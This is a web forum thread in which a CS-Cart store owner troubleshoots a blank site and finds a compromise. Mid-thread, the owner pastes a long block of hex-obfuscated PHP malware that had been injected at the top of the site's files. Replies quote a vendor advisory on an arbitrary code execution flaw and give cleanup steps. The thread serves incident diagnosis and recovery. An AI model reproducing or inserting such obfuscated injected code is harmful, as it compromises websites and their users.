Internal Server Error - File Editor

Hello



I was editing the gift certificate template in the File Editor. I had made a few changed and saved the changes several times with no issue but when I tried to save after my most recent change I got a red box in the corner saying "Error[color=#B94A48]Oops, something went wrong (Internal Server Error). Please try again.[/color] And now I can't save my changes, the website is also now completely blank.



Does anyone know how to fix this or where I may gone wrong?



[attachment=8675:error.jpg]

error.jpg

Dear Neptune,


  1. Open your config.local.php file
  2. Find the line


ini_set('display_errors', 0);




3. Replace 0 to 1



You will see what exactly wrong with your website!



Best regards, Alt-team.

No errors showed up, and when I went back into the file it was blank.

Ok so I've been on to my hosting company and there's an error with the code showing up in the logs:



[color=#333333][font=Arial, Helvetica, sans-serif][size=3]Wed Nov 12 11:24:25 2014] [error] [client 86.40.143.6] PHP Fatal error: Namespace declaration statement has to be the very first statement in the script in /usr/local/pem/vhosts/102845/webspace/httpdocs/deliverypaid.com/store/app/lib/vendor/composer/ClassLoader.php on line 13, referer: [/size][/font][/color][url=“https://www.deliverypaid.com/store/admin5860.php?dispatch=file_editor.manage”]https://www.deliverypaid.com/store/admin5860.php?dispatch=file_editor.manage[/url]

There is a issue at cpanel file editor. If you have edited using cpanel file editor then open file again and see the first file. Remove the blank spaces. Save it

Looking at the php files there's a lines and lines of php gibberish at the top of the file, is it possible I was hacked?



This is the code


!}W;utpi}Y;tuofuopd825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x78%x7878Bsfuvso!sboepn)%x5c%]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]4525c%x7825%x5c%x785cSFWSFT%x5c%x7860*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvu5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#njA%x5c%x7827&6<.fmjgA%x5c%x5c%x7824!#]y76]277]y72]265]x7825tdz)%x5c%x7825bbTx5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5npdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iux7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x78273qj%x5c%x78256<*Y%x!osvufs!|ftmf!~<**9.-x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}XfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5vufs!~<3,j%x5c%x7825>j%x2f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.PNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x78607825ff2!>!bssbz)%x5c%x7824]2)sutcvt-#w#)ldbqov>*ofmy%x5c%x78234]68]y33]65]y31]53]y6d]2]y72]282#5h%x5c%x782(-!#]y76]277]y72]265]6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860%x7827doj%x5c%x78256<%x5c%x78%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;o%x5c%x7825!*9!%x5c%x7827!hmg*K)ftpmdXA6~6%x5c%x782f7&6|7**c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]2625w:!>!%x5c%x78246767~6>>!}_;gvc%x5c%x7825}&;f]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utj-%x5c%x7824*1<%x5c%x7825j=tjh%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osc%x787f:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]525!*##>>X)!gjZ<#opo#>b%x5c%x7825!**c%x7827pd%x5c%x78256!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QU#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x782j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1%x5c%-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y7*%x5c%x7824%x5c%x782f%x5c%x7825k6~6<%x5c%x787fw6<*K)f7824!#]y81]273]y76]25c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x782525o:W%x5c%x7825c:>1<%x5c%x7825b:>1%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c5z>2*!%x5c%x7825z>3%*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%xUI&b%x5c%x7825!|!*)323zbek!~!hmg%x5c%x7825!<12>j%x5c%x25!|Z~!<##!>!2p%x5c%x7825!|!*5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%258]y6g]273]y76]271]y7d]252]y74]256##]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:569853e]81#%x5c%x782f#7e:559422)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x4%x5c%x78223}!+!<+{e%x5c%x7825+*!hofm%x5c%x7825:-5ppde:w6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%c%x7825%x5c%x7824-%x5c%x7824b!>!%x5cx7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5cR37,18R#>q%x5c%x7825VEzH,2W]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^b%x5c%x785l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%w6<%x5c%x787fw6*CW&)7gj6<*x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce4>!#]y84]275]y83]248]y83]256]y8185c^>Ew:Qb:Qc:W~!%x5c%x7825z!>21<%x5c%x7825x7825tdz>#L4]275L3]248L3P7825!|!*#91y]c9y]g2y]#>>*4-1-b787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7111127-K)ebfsX%x5c%x7827%x782f7#@#7%x5c%x782f7^#pjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}x5c%x7825%x5c%x7824-%x5c%xx29%51%x29%73", NULL); }UI&e_SEEB%x5c%x7860FUx7824*!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]%x5c%x7860ufh%x5c%x7860fmjg]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825jOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c!-#}#)fepmqnj!%x5c%x782f!#0#)iduc%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x785c%x7825z>2!fyqmpef)#%x5c%%x7827pd%x5c%x78256jubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!x7827,*c%x5c%x7827,*b%x5c%x7827)fep6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782825)ftpmdR6<*id%x5c%x7825)dfyfR%x55!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7887f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~92#-#}+;%x5c%x7825-qp%x5c%x7%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x782dovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~%x5c%x7822j:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]:^}&;!osvufs}%x5c%x7]88]5]48]32M3]317]445]212]445]43]321]464]284]364]65:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6u%x5c%x7825)7fmji%x5c%x78825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37fs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7place("%x2f%50%x2e%52%%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787f#%x5c%x785cq%x5c%x78257%x5cif((function_exists("%x6f%142%x5f%163%x4:|:**#ppde#)tutjyf%x5c%x786081]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x5c%x7825)uqpuft%x5c%x7860msvdc%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825Z<^2%x5c%x785c2b%5c%x7825)fnbozcYufhA%x5c%x788>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsq8y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825

Well, that's certainly not cs-cart code and someone's put in a lot of time to make it unreadable. So I'd say yes, you have been invaded by malware.

Dear Neptune,



There was a message from CS-Cart.



“[color=#262626][font=arial, sans-serif][size=3]We would like to inform you about a security vulnerability discovered in CS-Cart and Multi-Vendor 2.x.x to 4.1.2.[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]Please read the information below to learn how to know if your site was affected and how to protect it.[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]Note that even if your store was affected by this issue, this does not necessarily means that any sensitive data has been stolen or compromised. Our investigation shows that the affected stores were infected by a bot, but the bot has not collected any store data via the infected files yet.[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]Still, we strongly recommend you to apply the provided fix immediately to guarantee that your store is secure against this vulnerability.[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]Publish date: May 26, 2014[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3]Affected versions: 2.x.x, 3.0.x, 4.0.x, 4.1.1 to 4.1.2[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3]Vulnerability type: Arbitrary code execution[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3]Severity: Critical[/size][/font][/color]





Summary



[color=#262626][font=arial, sans-serif][size=3]The update fixes a vulnerability that can result in a remote unauthenticated attacker executing arbitrary script in the context of the end-user’s browser session.[/size][/font][/color]





Check if your site was affected



[color=#262626][font=arial, sans-serif][size=3]Check if the following files exist in the CS-Cart directory on your server:[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3]js/thumbs.php[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3]images/test.gif[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]If these files exist, immediately remove them.[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]We also recommend to check your server for new unknown files and unauthorized file changes.[/size][/font][/color]





Solution



[color=#262626][font=arial, sans-serif][size=3]Follow the instructions for your CS-Cart or Multi-Vendor version:[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]1) In CS-Cart 4.0.x, 4.1.1 to 4.1.2 and Multi-Vendor 4.0.x, 4.1.1 to 4.1.2: [/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] a) Delete the file app/payments/atos.php[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] B) Delete the directory app/payments/atos_files[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] c) Delete the file app/payments/hsbc.php[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] d) Delete the directory app/payments/hsbc_files[/size][/font][/color]



[color=#262626][font=arial, sans-serif][size=3]2) In CS-Cart 2.x.x and 3.0.x (all editions)[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] a) Delete the file payments/atos.php[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] B) Delete the directory payments/atos_files[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] c) Delete the file payments/hsbc.php[/size][/font][/color]

[color=#262626][font=arial, sans-serif][size=3] d) Delete the directory payments/hsbc_files[/size][/font][/color]”



Hope that it will help you.



Best regards, Alt-team.

Thanks guys :)


[quote][color=#262626][font=arial, verdana, tahoma, sans-serif][font=arial, sans-serif][size=3]js/thumbs.php[/size][/font][/font][/color]

[color=#262626][font=arial, verdana, tahoma, sans-serif][font=arial, sans-serif][size=3]images/test.gif[/size][/font][/font][/color][/quote]

[color=#262626][font=arial, sans-serif][size=3]Weren’t there but I deleted the [/size][/font][/color]

[quote]

[color=#262626][font=arial, sans-serif][size=3]1) In CS-Cart 4.0.x, 4.1.1 to 4.1.2 and Multi-Vendor 4.0.x, 4.1.1 to 4.1.2: [/size][/font][/color]

[color=#262626][font=arial, verdana, tahoma, sans-serif][font=arial, sans-serif][size=3]a) Delete the file app/payments/atos.php[/size][/font][/font][/color]

[color=#262626][font=arial, verdana, tahoma, sans-serif][font=arial, sans-serif][size=3] B) Delete the directory app/payments/atos_files[/size][/font][/font][/color]

[color=#262626][font=arial, verdana, tahoma, sans-serif][font=arial, sans-serif][size=3]c) Delete the file app/payments/hsbc.php[/size][/font][/font][/color]

[color=#262626][font=arial, verdana, tahoma, sans-serif][font=arial, sans-serif][size=3]d) Delete the directory app/payments/hsbc_files[/size][/font][/font][/color]

[/quote]



The site is still blank but will I need to go through every php file individually and delete this unreadable code? Or should I just delete everything and do a full reinstall, ideally I’d be looking to avoid this.

Dear Neptune,



As you understand there are several methods of this problem solving:


  1. Check every php file and remove code manually, it is better to replace these files with original ones;
  2. Make the reinstallation of the CS-cart;
  3. Contact specialists who will deal with this problem instead of you.



    P.S. Also if you do not have additional add-ons, it is better to make the backup of the folder app. And replace it with the original folder.



    Best regards, Alt-team.

What the OP reported is not the signature of the security issue that came from the payment systems (or at leasst from the 30+ I've investigated, I've not seen that signature result from that particular breech).

Would suggest you change your cPanel passwords (and WHM if you have a VPS), any root passswords on your server as well as your normal admin URL and admin passwords. Would also suggest that you force users to change their passwords on their next access to your site. Then you should

  1. scan your php files for any key words from the signature above and investigate/repair those files.
  2. Run a good malware detector on your site to look for an infection.



    The problem with malware is that it's not hard to detect it's presence, but it is very hard to identtify the entry point. So even if you find/remove the actual malware, it could be a never-ending process until you can identify (and close) the actual entry point of the injection(s),